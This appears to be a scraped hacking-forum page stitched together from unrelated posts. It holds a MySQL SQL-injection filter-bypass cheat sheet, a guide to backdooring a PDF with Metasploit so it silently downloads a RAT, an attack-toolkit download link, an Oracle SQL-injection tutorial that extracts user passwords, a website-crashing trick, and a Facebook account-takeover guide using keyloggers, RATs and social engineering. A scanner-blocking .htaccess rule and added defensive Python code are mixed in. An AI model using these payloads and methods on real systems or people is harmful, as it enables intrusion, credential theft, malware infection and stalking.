CRC32 (true)

Extract substrings
substr ('abc', 1,1) = 'a'
substr ('abc' from 1 for 1) = 'a'
substring ('abc', 1,1) = 'a'
substring ('abc' from 1 for 1) = 'a'
mid ('abc', 1,1) = 'a'
mid ('abc' from 1 for 1) = 'a'
lpad ('abc', 1, space (1)) = 'a'
RPAD ('abc', 1, space (1)) = 'a'
left ('abc', 1) = 'a'
reverse (right (reverse ('abc'), 1)) = 'a'
insert (insert ('abc', 1,0, space (0)), 2,222, space (0)) = 'a'
space (0) = trim (version () from (version ()))

Search substrings
locate ('a', 'abc')
position ('a', 'abc')
position ('a' IN 'abc')
INSTR ('abc', 'a')
SUBSTRING_INDEX ('ab', 'b', 1)

Cut substrings
length (trim (leading 'a' FROM 'abc'))
length (replace ('abc', 'a', "))

Compare strings
strcmp ('a', 'a')
mod ('a', 'a')
find_in_set ('a', 'a')
field ('a', 'a')
count (concat ('a', 'a'))

String length
length ()
bit_length ()
char_length ()
octet_length ()
bit_count ()

String case
ucase
LCase
lower
upper
password ('a')! = password ('A')
OLD_PASSWORD ('a')! = OLD_PASSWORD ('A')
md5 ('a')! = md5 ('A')
sha ('a')! = sha ('A')
AES_ENCRYPT ('a')! = AES_ENCRYPT ('A')
DES_ENCRYPT ('a')! = DES_ENCRYPT ('A')
Keyword filter

Connected keyword filtering
(0) union (select (table_name), column_name, ...
0 / ** / union / *! 50000select * / table_name `foo` / ** / ...
0% a0union% a0select% 09group_concat (table_name) ....
0'union all select all `table_name` foo from `information_schema`. `Tables`

OR, AND
'| | 1 = '1
'&& 1 = '1
'='
'-'

OR, AND, UNION
'And (select pass from users limit 1) =' secret

OR, AND, UNION, LIMIT
'And (select pass from users where id = 1) =' a

OR, AND, UNION, LIMIT, WHERE
'And (select pass from users group by id having id = 1) =' a

OR, AND, UNION, LIMIT, WHERE, GROUP
'And length ((select pass from users having substr (pass, 1,1) =' a '))

OR, AND, UNION, LIMIT, WHERE, GROUP, HAVING
'And (select substr (group_concat (pass), 1,1) from users) =' a
'And substr ((select max (pass) from users), 1,1) =' a
'And substr ((select max (replace (pass,' lastpw ', ")) from users), 1,1) =' a

OR, AND, UNION, LIMIT, WHERE, GROUP, HAVING, SELECT
'And substr (LOAD_FILE (' file '), locate (' DocumentRoo t ', (LOAD_FILE (' file '))) + length (the' ot DocumentRo '), 10) =' a
'= "Into outfile' / var / www / dump.txt

OR, AND, UNION, LIMIT, WHERE, GROUP, HAVING, SELECT, FILE
'Procedure Analyse () #
'-If (name =' Admin ', 1,0) #
'-If (if (name =' Admin ', 1,0), if (substr (pass, 1,1) = a', 1,0), 0) #

Control flow
case 'a' when 'a' then 1 [else 0] end
case when 'a' = 'a' then 1 [else 0] end
if ('a' = 'a', 1.0)
IFNULL (NULLIF ('a', 'a'), 1)

Enjoy..
PROTOTYPE...
 

Blocking Automated Scanners Against Your Website



Credits: Cyberb0y.

We all know that there has been vast development in automated vulnerability scanners. There are countless private, public, free and commercial automated web vulnerability scanners. Since they are available all over the internet, it has become easy for anyone to find a vulnerability in your website by running an automated scanner against it, and that causes problems for webmasters. Even if no vulnerability is detected, the scan still affects the website, because an automated scanner sends numerous requests in order to conduct it. The website is thereby affected in terms of bandwidth, and if a vulnerability is found it might get exploited. So it is better to make arrangements beforehand to stop people from using automated scanners on your website.



This can be done by adding a few lines to the .htaccess file on your server.
THE CODE IS AS FOLLOWS ===>>>

<IfModule mod_rewrite.c>
RewriteEngine On
# Match the User-Agent strings sent by common scanners ([NC] = case-insensitive, [OR] = any condition may match)
RewriteCond %{HTTP_USER_AGENT} ^w3af.sourceforge.net [NC,OR]
RewriteCond %{HTTP_USER_AGENT} dirbuster [NC,OR]
RewriteCond %{HTTP_USER_AGENT} nikto [NC,OR]
RewriteCond %{HTTP_USER_AGENT} SF [OR]
RewriteCond %{HTTP_USER_AGENT} sqlmap [NC,OR]
RewriteCond %{HTTP_USER_AGENT} fimap [NC,OR]
RewriteCond %{HTTP_USER_AGENT} nessus [NC,OR]
RewriteCond %{HTTP_USER_AGENT} whatweb [NC,OR]
RewriteCond %{HTTP_USER_AGENT} Openvas [NC,OR]
RewriteCond %{HTTP_USER_AGENT} jbrofuzz [NC,OR]
RewriteCond %{HTTP_USER_AGENT} libwhisker [NC,OR]
RewriteCond %{HTTP_USER_AGENT} webshag [NC,OR]
# Acunetix WVS is matched on its own request header instead of the User-Agent
RewriteCond %{HTTP:Acunetix-Product} ^WVS
# Redirect every matching request to the loopback address
RewriteRule ^.* http://127.0.0.1/ [R=301,L]
</IfModule>
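
User-Agent rules like these only stop scanners that announce themselves, so they are best paired with a check on request behaviour in the access log. The following Python script is an added example, not part of the original post: it triages an Apache combined-format log using the scanner names from the rules above (the case-sensitive SF rule is left out) plus a 404-ratio check. The thresholds, function names and sample log lines are assumptions constructed for illustration.

```python
import re
from collections import defaultdict

# User-Agent names based on the .htaccess rules above (matched case-insensitively).
SCANNER_UA = re.compile(
    r"w3af\.sourceforge\.net|dirbuster|nikto|sqlmap|fimap|nessus|whatweb|"
    r"openvas|jbrofuzz|libwhisker|webshag", re.IGNORECASE)

# Apache "combined" format: ip ident user [time] "request" status bytes "referer" "user-agent"
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<req>[^"]*)" (?P<status>\d{3}) \S+ '
    r'"[^"]*" "(?P<ua>[^"]*)"$')

def triage(lines, min_requests=5, max_404_ratio=0.6):
    """Return {ip: reason} for clients that look like automated scanners."""
    total, not_found, flagged = defaultdict(int), defaultdict(int), {}
    for line in lines:
        m = LOG_LINE.match(line.strip())
        if not m:
            continue  # skip lines that are not in combined format
        ip = m["ip"]
        total[ip] += 1
        if m["status"] == "404":
            not_found[ip] += 1
        if SCANNER_UA.search(m["ua"]):
            flagged[ip] = "scanner user-agent"
    # Behavioural check: catches clients probing many missing paths with a browser-like User-Agent.
    for ip, count in total.items():
        if ip not in flagged and count >= min_requests and not_found[ip] / count >= max_404_ratio:
            flagged[ip] = "high 404 ratio"
    return flagged

def _line(ip, path, status, ua):
    """Build one constructed log line in combined format."""
    return f'{ip} - - [01/Jan/2024:10:00:00 +0000] "GET {path} HTTP/1.1" {status} 512 "-" "{ua}"'

BROWSER = "Mozilla/5.0 (X11; Linux x86_64) Firefox/115.0"
# Constructed sample log (documentation IP ranges, not real traffic).
SAMPLE_LOG = (
    [_line("192.0.2.10", "/index.php", 200, "Mozilla/5.00 (Nikto/2.1.6)")]
    + [_line("198.51.100.7", f"/backup{i}.zip", 404, BROWSER) for i in range(8)]
    + [_line("198.51.100.7", "/", 200, BROWSER)]
    + [_line("203.0.113.5", p, 200, BROWSER) for p in ("/", "/about", "/contact")]
    + [_line("203.0.113.5", "/favicon.ico", 404, BROWSER)]
)

if __name__ == "__main__":
    for ip, reason in triage(SAMPLE_LOG).items():
        print(ip, reason)
```

The second client is caught only by the 404-ratio check, which is the case the .htaccess rules cannot see.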
 

Backdooring a pdf ebook with metasploit

As we all use RAT, Botnets but the things went wrong when our rats and bots get detected by antiviruses. But today i am gonna show you how to backdoor a pdf ebook.
Yes a pdf ebook.


Concept behind this--->
Victim will open our pdf file but in background it will download our rat and bot silently and will infect the victim.

Things you need----->
1. A pdf book (use any book)
2. Metasploit(use backtrack OS)
3. Your Rat or bot hosted at any file sharing site(Make sure you use direct link like www.filesharing.com/server.exe)

Now Lets start this---->
1. Open up Metasploit console

2. Type this in the console:
3. Type this in the console:

4. Type this in console:

EXAMPLE: set INFILENAME /root/mypdf.pdf

5. Type this in console:

EXAMPLE: set url http://download.com/server.exe

6. Type this in console:

Now you will get infected pdf in root folder just send ur pdf file to victim and when he open the pdf file he/she will able to read pdf but in background pdf file will download our rat and bot in victim computer.

Note:
1. Use direct link for your rat.
2. Use a good pdf file so as victim try to open it.


source:hackthevilblog
 

Project Amaterasu Release 1

The script consists of the 10 tools most used by hackers and pentesters, plus
2 private scripts: 1 - Subdomain scanner, 2 - FTP brute forcer.

This is release 1. The next release will contain up to 5 private scripts different from these.
The final release will have all private scripts plus my own coded scripts :)


Download:
https://www.dropbox.com/s/aq3toi7graxcv6r/Amaterasu.tar.gz
 

Oracle SQL Injection Tutorial

Hello and welcome to an Oracle SQL injection tutorial. First you need to know that injecting into Oracle databases is not much different from injecting into others. The only differences are the syntax, the filenames and so on. If you know a site that is vulnerable to some sort of SQLi but you don't know what database it uses, try the following code to check for an Oracle DB.

Code:

https://somesite.com/calender.asp?day=7%...CT%20NULL%
20from%20dual--

If it is an Oracle DB you should get an error like:

Code:

[Oracle][ODBC][Ora]ORA-01789: query block has incorrect number of result
columns

Now, to find the number of columns, keep adding NULL values until you no longer receive an error.

Code:

https://somesite.com/calender.asp?day=7%...NULL,NULL%
20from%20dual--

Now that you have the number of columns you can proceed to extract data from the DB. In this guide I will only show how to extract the account info but, other info can be extracted as well.

Now we try to find which column uses "string" data type. To do this we replace the first "NULL" with 'a'. If you receive an error replace the 'a' with Null and try the next "NULL". An example of this is:

Code:

https://somesite.com/calender.asp?day=7%...,'a',NULL%
20from%20dual--

Once you find the columns that use string data types you can start to search for the names of the tables containing useful info. To do this we use the "user_objects" table.We also use the "object_name" and "object_type" table names to show what the names and types of tables are that are specified as user data (Credentials). A example of the following would be like so:

Code:

https://somesite.com/calender.asp?day=7%...CT%20NULL,
object_name,object_type,NULL%20from%20user_objects--

As you can see, we use the columns that use string data to show object_name and object_type.


Tip: You can also use the all_user_objects table instead of user_objects. This will show all info seen by the user even if the user does not own it.

We should now see many different table names and types. If you don't, and you get an error, try removing NULL values and finding the columns that use a string data type.

In my example lets just say we found a table called USERS. We will attempt to find the names of the column inside this table by using the user_tab_columns table like so:

Code:

https://somesite.com/calender.asp?day=7%...CT%20NULL,
column_name,NULL,NULL%20from%20user_tab_columns%20where%20table_name%20%
3d%20’USERS’--

Note: %3d is a URL encoded = and %20 is a URL encode whitespace (spacebar).

Now lets say we get login, password, and priviledge columns. We can query these by using the following code:

Code:

https://somesite.com/calender.asp?day=7%...CT%20NULL,
login,password,priviledge%20from%20users--

You should get the login username, password, and priviledge level!

Tip: If there is only one column that uses string data type then you can concatenate multiple columns like so:

Code:

https://somesite.com/calender.asp?day=7%...CT%20NULL,
login||’:’||password||’:’||priviledge,NULL,NULL%20from%20user_objects--

This is just like the concat command in MySQL.

Tip: If you want to perfect your oracle injection knowledge I recommend getting some e-books on oracle and installing oracle on your localhost. This way you can practice on your DB.
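
Every request in this tutorial works because the `day` parameter is pasted into the SQL statement as text. The following Python example is added here and is not part of the original tutorial: it puts that pattern beside the fix, which is type validation plus a bind variable. SQLite stands in for Oracle so that it runs offline, and the table layout, function names and sample values are assumptions constructed for illustration.

```python
import sqlite3

def make_db():
    """Build a constructed in-memory database (SQLite stands in for Oracle here)."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE events (day INTEGER, title TEXT, room TEXT);
        CREATE TABLE users (login TEXT, password TEXT, priviledge TEXT);
        INSERT INTO events VALUES (7, 'Team meeting', 'B12');
        INSERT INTO users VALUES ('admin', 'constructed-secret', 'dba');
    """)
    return db

def events_vulnerable(db, day):
    # The request parameter is concatenated into the statement,
    # so UNION input becomes part of the query itself.
    return db.execute("SELECT title, room FROM events WHERE day = " + day).fetchall()

def events_bound(db, day):
    # The value travels as a bind variable and is only ever compared as data.
    return db.execute("SELECT title, room FROM events WHERE day = ?", (day,)).fetchall()

def events_hardened(db, day):
    # Validate the type and range first, then bind the converted integer.
    if not day.isdigit() or not 1 <= int(day) <= 31:
        raise ValueError("day must be an integer from 1 to 31")
    return events_bound(db, int(day))

# Constructed input in the style of the requests shown in the tutorial.
INJECTED = "7 UNION SELECT login, password FROM users"

if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", events_vulnerable(db, INJECTED))
    print("bound only:", events_bound(db, INJECTED))
    try:
        events_hardened(db, INJECTED)
    except ValueError as exc:
        print("hardened rejects input:", exc)
```

On Oracle the same fix is a bind variable in the prepared statement, and the application account should have no read access to credential tables it does not need.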
 

Crash a small website with Firebug

1. You will need to download Firefox or Opera (of you choose Opera skip to number 5)

2. Open up Firefox, and go to the tool bar.. open Tools>Addons, and then go to get addons, and search: Firebug.

3. Install Firebug, and then restart Firefox.

4. Firebug should be at the bottom right corner of your browser. Now just go to the small blog and/or website of your choice.



5. Post a blog... but not just any blog.. the crash blog! What you're going to do, is... right click on the submit button, and scroll down to inspect element (click it), then you are going to find the element that says maxchar and change it, and the value to whatever the hell you want! My suggestion is that you hold down the 9 button for like 10 minutes.

6. once the maxchar has been changed... find as many of the biggest web pages on the internet, select all copy and paste them into your blog, over and over and over again.. my suggestion is that you wikipedia search cheese, and copy and paste that over and over.

7. Submit, and watch the website crash!


 

[eBook] The REA-books cRaCkErTeAm Tutorials

This can be said as a thick tut giant REA 517 pages, including 25 113 crack soft crackme tuts and tuts. This lag is built according to the table of contents for convenient reference and reference. The article meticulously, clearly defining point in looking to conduct and analyze crack the code so that Asm Keygen conducted in a particular programming language.


 

Bypass Facebook Security Jacking Method


Ever since I had been problems constantly having to deal with facebook leaving me out off people's accounts I began to think that I should write over my experiences to help others.

I will go over specific techniques and ideas to eventually grant you entrance to their accounts without having to deal with that Facebook problem having logging in from different location.

1st. Before you even begin reading this, you must already have their passwords or e-mails. If not, I will tell you a few ideas of how to acquire them.



If you only want to log in without changing passwords, I would suggest that you steal their passwords through Phishing, keylogging, or RATing.

2nd. Bypassing Facebook security can be done through black hat methods, however I will not go over those methods, instead I will be touching the social engineering methods which are more effective and you can get faster results.

3rd. You will need to use your brain to think and have patience. If you don't have either a brain to think or the patience to wait, please don't continue reading this tutorial because you will not get any success.

Ok, let's move on to the actual information.

-This method is a cheap shot method, but you never know if it might work or not.

#1. If a person uses a particular computer to log in to their accounts on a regular basis, THAT computer alone should be your focus.

You should infect that computer with a keylogger and have it linked together with a FTP to send you the logs or linked to send you e-mails.

#2. Another method is to use your OWN computer to acquire the password by infecting yourself with a keylogger and let the victim use your computer. Gain their trust to the point of where they can log in to different websites.

You can say for instance "My account is not working, I think Facebook banned me. Can you test your account to see if yours is working?"

And of course, they will log in and you will gain the information. After they successfully log in, you can login to your account and say "Oh, there we go! It worked"

Now, you will attempt to log in in the future and the problem of Logging in from another location will dissapear.

#3. Let's say that they aren't stupid enough to use your computer to log in, you might think, what then? Well, here's my next suggestion to you.

Considering that you will already have the password through the methods I mentioned earlier, but you will have the problem of Logging in from another location.

Here's what you do:

Watch and study your victim, if you know he/she uses a location to use a computer, you should attempt to log in at that same location as well. It could be school, library, another friend's house, etc...

Most people will use any computer to log in to Social Networks or E-mails to check on updates. Considering that the IP you log in at that particular is the same within their network, the problem of Logging in from another location will not come up.

#4. So, you don't have the choice of either offering your computer as a trap or the chance to "stalk" your victim. You wonder, what do I do then?

Well, this is where it gets more tricky considering that Facebook finally came up with an ingenious method to avoid intruders of taking over accounts easily.

Here's what Facebook did, in case if you don't already know. Facebook implemented a feature where you must visually recognize the friends on that account. They will show you pictures of random people within that account and ask you to select the name of that person.

If you don't recognize any of those people, you're screwed.

When will this happen? That will only happen when you attempt to change their passwords, so Facebook makes sure that you do in fact own that account. I personally wouldn't attempt to change the passwords, but if you do try, here's what I would recommend to you.

-If you know the person in person, notice who he/she is friends with to try to recognize the faces and physically ask the other persons their names.

-If you do not know the person, you can use websites like:
http://com.lullar.com/
http://www.pipl.com/email/

To search their names, e-mails, phone numbers to see whether if you can find them on other Social networks. You can search the person's name manually by going to Myspace, Facebook, etc...To see who they have added as friends.

Your next step will be to add a friend of the victim or the victim directly. Adding the victim directly would probably be the best plan because you would have access directly to all the victims' friends and their pictures.

Now, all you have to do is match the pictures that Facebook asks you when you attempt to change their passwords by going to the victims friends and match them.

If you don't want to change their passwords, you can mask the victim's IP using other methods in which I will not go over. To find out their IP, you will need a RAT to manually whois them or any other method other there to find their IP.

A quick method I will suggest to you is to send the victim an e-mail if they have a hotmail account. When they reply you can right click on the e-mail and view source. You will see an IP from sender and use that to mask.

Mask their IP and facebook will not give you the problem of Logging in from another location.

If you follow the suggestions I have given you, you will surely gain entrance to their accounts and Facebook won't be able to do crap.

Their security is strong, but good ol' Social engineering never fails. Thumbsup

Enjoy.